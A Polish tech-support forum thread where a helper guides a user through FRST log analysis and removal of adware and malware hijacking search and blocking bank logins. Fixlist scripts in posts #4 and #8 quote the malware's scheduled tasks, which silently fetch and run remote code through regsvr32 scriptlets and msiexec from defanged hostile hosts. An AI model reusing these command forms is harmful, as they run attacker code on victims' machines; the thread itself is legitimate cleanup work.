Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

DealWiFi - problem

#1
DealWiFi - problem
Witam, 

nie było mnie kilka dni w domu, podczas którego moja mama użytkowała mojego laptopa. 

Po powrocie czekało mnie kilka niespodzianek: 

1. Jako wyszukiwarkę mam ustawioną domyślnie "DealWiFi "
2. Nie mogę zalogować się na konto bankowe - proces logowania ładuje się w nieskończoność (na drugim komputerze działa bez zarzutu)
3. Tną mi się gry, które wcześniej działały bez problemu. 

Przeskanowałem komputer ComboFix. 
Wyniki:  http://wklej.org/id/3096991/

Bardzo proszę o poradę co może się dziać...
 System operacyjny: windows_seven Przeglądarka: chrome
#2
RE: DealWiFi - problem
Cytat:Przeskanowałem komputer ComboFix.
Brawo Chytry .

Przedstaw komplet logów: http://forum.pcformat.pl/Problem-z-rekla...owe-logi-t .
Nie pomagam na PW (ew. odpłatnie). 
I osobom z roszczeniowym podejściem. I osobom niedbającym o poprawność językową.
Jak podawać logi
Jeśli nie odpowiadam w danym wątku przez >3 dni - proszę o przypomnienie na PW z linkiem do wątku w treści.




 System operacyjny: windows_seven Przeglądarka: firefox
#3
RE: DealWiFi - problem
Po przeskanowaniu niżej wymienionymi programami odinstalowało mi się DealWiFi

Jednak w dalszym ciągu:

1. Nie mogę zalogować się na konto bankowe z Chrome

2. Nawet najprostsze gry bardzo mi tną

ComboFix: http://wklej.org/id/3097592/

AdwCleaner: http://wklej.org/id/3097594/

Przy FRST wyskoczyły mi 3 logi:
- FRST: http://wklej.org/id/3097601/
- Addition: http://wklej.org/id/3097603/
- Shortcut: http://wklej.org/id/3097604/

EDIT:

Przed chwilą wywaliło mnie w Chrome, a samoistnie zainstalował mi się Firefox... W Panelu sterowania jak i CClineanerze nie widnieje i nie mogę go odinstalować...

Ad. Przeskanowałem jeszcze raz AdwCleaner, wykryło mi 28 zagrożeń: http://wklej.org/id/3097635/
 System operacyjny: windows_seven Przeglądarka: chrome
#4
RE: DealWiFi - problem
Gdzie ja napisałem że masz użyć ComboFix?? Poczytaj: https://forum.pcformat.pl/WAZNE-Jak-zalo...ec-WAZNE-t , szczególnie p.6.

Do Notatnika wklej (bez frazy "Kod:"):
Kod:
Task: {1F2FE6BB-DB8C-474F-867C-83FE3B21CC2E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1YFUNWRWRYNjRSMUU5FdU1NdzSFTYxN8FcNkJSNTVWRH== scrobj.dll
Task: {E2642FC1-B4ED-4ECE-9B1C-574B031367A4} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1YFUNWRWRYNjRSMUU5FdU1NdzSFTYxN8FcNkJSNTVWRH== scrobj.dll
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
HKU\S-1-5-21-629254379-1472506870-1867118468-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
Toolbar: HKU\S-1-5-21-629254379-1472506870-1867118468-1000 -> Brak nazwy - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} -  Brak pliku
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
EmptyTemp:
Skrypt unikatowy - proszę nie stosować do "takich samych" przypadków.

Plik > Zapisz jako: fixlist.txt w katalogu w którym jest FRST.exe. Uruchom FRST: Napraw > w tym samym katalogu powstanie log wynikowy: fixlog.txt. Potwierdź restart kompa.
Uwaga: narzędzie usunie wszystkie pliki tymczasowe.

Zamknij wszystkie przeglądarki, uruchom AdwCleaner > Skanuj > Oczyść > restart.
Pokaż log AdwCleaner + fixlog.txt + nowe logi FRST.
Nie pomagam na PW (ew. odpłatnie). 
I osobom z roszczeniowym podejściem. I osobom niedbającym o poprawność językową.
Jak podawać logi
Jeśli nie odpowiadam w danym wątku przez >3 dni - proszę o przypomnienie na PW z linkiem do wątku w treści.




 System operacyjny: windows_seven Przeglądarka: firefox
#5
RE: DealWiFi - problem
AdwCleaner: http://wklej.org/id/3097746/

fixlog.txt: http://wklej.org/id/3097729/

FRST: http://wklej.org/id/3097732/
Addition: http://wklej.org/id/3097734/
Shortcut: http://wklej.org/id/3097735/
 System operacyjny: windows_seven Przeglądarka: chrome
#6
RE: DealWiFi - problem
Wszystko pochrzaniłeś:
1. Plik fixlist.txt był pusty.
2. AdwCleaner miał wykonać opcję Oczyść - czyli po uruchomieniu: Skanuj > Oczyść.

Wykonaj jeszcze raz po kolei wszystkie czynności.
Nie pomagam na PW (ew. odpłatnie). 
I osobom z roszczeniowym podejściem. I osobom niedbającym o poprawność językową.
Jak podawać logi
Jeśli nie odpowiadam w danym wątku przez >3 dni - proszę o przypomnienie na PW z linkiem do wątku w treści.




 System operacyjny: windows_seven Przeglądarka: firefox
#7
RE: DealWiFi - problem
AdwCleaner: http://wklej.org/id/3097767/

Fixlog: http://wklej.org/id/3097768/

FRST: http://wklej.org/id/3097773/
Addition: http://wklej.org/id/3097775/
Shortcut: http://wklej.org/id/3097776/
 System operacyjny: windows_seven Przeglądarka: chrome
#8
RE: DealWiFi - problem
Odinstaluj ComboFix: Start > w polu wyszukiwania wpisz: combofix /uninstall [Enter]
( https://www.bleepingcomputer.com/combofi...a-combofix ).

Cały czas siedzi w systemie jakieś świństwo. Do Notatnika wklej (bez frazy "Kod:"):

Kod:
Task: {650D784A-759B-4F62-879C-562CA371DC07} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE ->
R2 3DM; C:\Users\Medion\AppData\Local\3DM\Kitty.dll [754688 2017-04-18] (kitty.exe) [Brak podpisu cyfrowego]
C:\Users\Medion\AppData\Local\3DM
C:\Users\Medion\AppData\Roaming\SSMgre
C:\Users\Public\Documents\temp.dat
C:\Program Files (x86)\BiaoJi
C:\Windows\system32\log
emptytemp:
Skrypt unikatowy - proszę nie stosować do "takich samych" przypadków.

Plik > Zapisz jako: fixlist.txt w katalogu w którym jest FRST.exe. Uruchom FRST: Napraw > w tym samym katalogu powstanie log wynikowy: fixlog.txt. Potwierdź restart kompa.

Pokaż + fixlog.txt + nowe logi FRST.
Nie pomagam na PW (ew. odpłatnie). 
I osobom z roszczeniowym podejściem. I osobom niedbającym o poprawność językową.
Jak podawać logi
Jeśli nie odpowiadam w danym wątku przez >3 dni - proszę o przypomnienie na PW z linkiem do wątku w treści.




 System operacyjny: windows_seven Przeglądarka: firefox
#9
RE: DealWiFi - problem
Fixlog: http://wklej.org/id/3097886/

FRST: http://wklej.org/id/3097891/
Addition: http://wklej.org/id/3097893/
Shourtcut: http://wklej.org/id/3097895/
 System operacyjny: windows_seven Przeglądarka: chrome
#10
RE: DealWiFi - problem
Jeszcze poprawka: Do Notatnika wklej (bez frazy "Kod:"):
Kod:
C:\Windows\SysWOW64\33
C:\Windows\SysWOW64\11
C:\Qoobox
folder: C:\Program Files (x86)\Everness
folder: "C:\Program Files (x86)\Everness"
Skrypt unikatowy - proszę nie stosować do "takich samych" przypadków.

Plik > Zapisz jako: fixlist.txt w katalogu w którym jest FRST.exe. Uruchom FRST: Napraw > w tym samym katalogu powstanie log wynikowy: fixlog.txt. Pokaż fixlog.txt.

Jak się zachowuje system?
Nie pomagam na PW (ew. odpłatnie). 
I osobom z roszczeniowym podejściem. I osobom niedbającym o poprawność językową.
Jak podawać logi
Jeśli nie odpowiadam w danym wątku przez >3 dni - proszę o przypomnienie na PW z linkiem do wątku w treści.




 System operacyjny: windows_seven Przeglądarka: firefox
Programy: Polecane / Nowe / Inne




Skocz do:


Wybrane wątki (DealWiFi - problem)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
Ściana Kopalnia z svchost w tle Matieo96 3 6703 26.04.2018 01:49
Ostatni post: Illidan
  TeamViewer nie uruchamia się. ~Anonim 2 2379 26.04.2018 01:46
Ostatni post: Illidan
  zły obraz Win 7 orzel132 9 6332 24.04.2018 01:24
Ostatni post: Illidan
  Cloudflare "One more step" lotand 18 12699 19.04.2018 19:45
Ostatni post: AgentS
  SYSTEM_SERVICE_EXCEPTION cyberbrain666666 2 6078 02.04.2018 03:28
Ostatni post: Illidan
  Komputer wolniej chodzi,explorer.exe ma duży zasób procesu tayeenek 1 5445 29.03.2018 16:07
Ostatni post: Illidan
  hijack.host elwis_95 2 5886 26.03.2018 19:16
Ostatni post: ~Anonim
  Jak usunąć pup.optional... funkyymonk 1 1335 23.03.2018 12:05
Ostatni post: morderca
  Backup a ransomware Grzesiek11 2 5715 19.03.2018 17:30
Ostatni post: ~Anonim
  Przekierowywanie przez przeglądarki na strony "reklamowe", dziwne procesy tic00 24 19078 19.03.2018 12:12
Ostatni post: Illidan
  POMOCY PENDRIVE TWORZY SKROT macuskowal 4 6168 15.03.2018 22:27
Ostatni post: macuskowal
  AntiVir Command Line Scanner for Windows - Jak usunąć? Silver102 2 1223 14.03.2018 17:27
Ostatni post: Silver102
  Brak polskich znaków w folderach po podlączeniu pendrive zgrzytek 2 5825 13.03.2018 18:41
Ostatni post: zgrzytek
  AVAST UKAZUJE ZBĘDNE PLIKI. TADEUSZ_1956 5 9860 13.03.2018 03:39
Ostatni post: TADEUSZ_1956
  Po uruchomieniu laptopa włącza się jakaś ruska strona emilka100 10 2844 13.03.2018 02:43
Ostatni post: Illidan